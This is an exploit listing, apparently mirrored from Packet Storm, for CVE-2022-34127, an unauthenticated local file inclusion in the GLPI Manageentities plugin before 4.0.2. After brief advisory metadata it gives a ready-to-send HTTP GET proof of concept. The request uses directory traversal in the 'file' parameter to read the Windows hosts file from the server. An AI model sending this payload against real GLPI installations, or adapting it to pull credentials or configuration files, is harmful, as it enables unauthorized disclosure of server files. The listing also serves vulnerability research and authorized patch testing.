Exploit for GLPI Manageentities Local File Inclusion CVE-2022-34127

## https://sploitus.com/exploit?id=PACKETSTORM:171653
# ADVISORY INFORMATION  
# Exploit Title: GLPI 4.0.2 - Unauthenticated Local File Inclusion on Manageentities plugin  
# Date of found: 11 Jun 2022  
# Application: GLPI Manageentities < 4.0.2  
# Author: Nuri Çilengir   
# Vendor Homepage: https://glpi-project.org/  
# Software Link: https://github.com/InfotelGLPI/manageentities  
# Advisory: https://pentest.blog/advisory-glpi-service-management-software-sql-injection-remote-code-execution-and-local-file-inclusion/  
# Tested on: Ubuntu 22.04  
# CVE : CVE-2022-34127  
  
# PoC  
GET /marketplace/manageentities/inc/cri.class.php?&file=../../\\..\\..\\..\\..\\..\\..\\..\\Windows\\System32\\drivers\\etc\\hosts&seefile=1 HTTP/1.1  
Host: 192.168.56.113  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:100.0) Gecko/20100101 Firefox/100.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1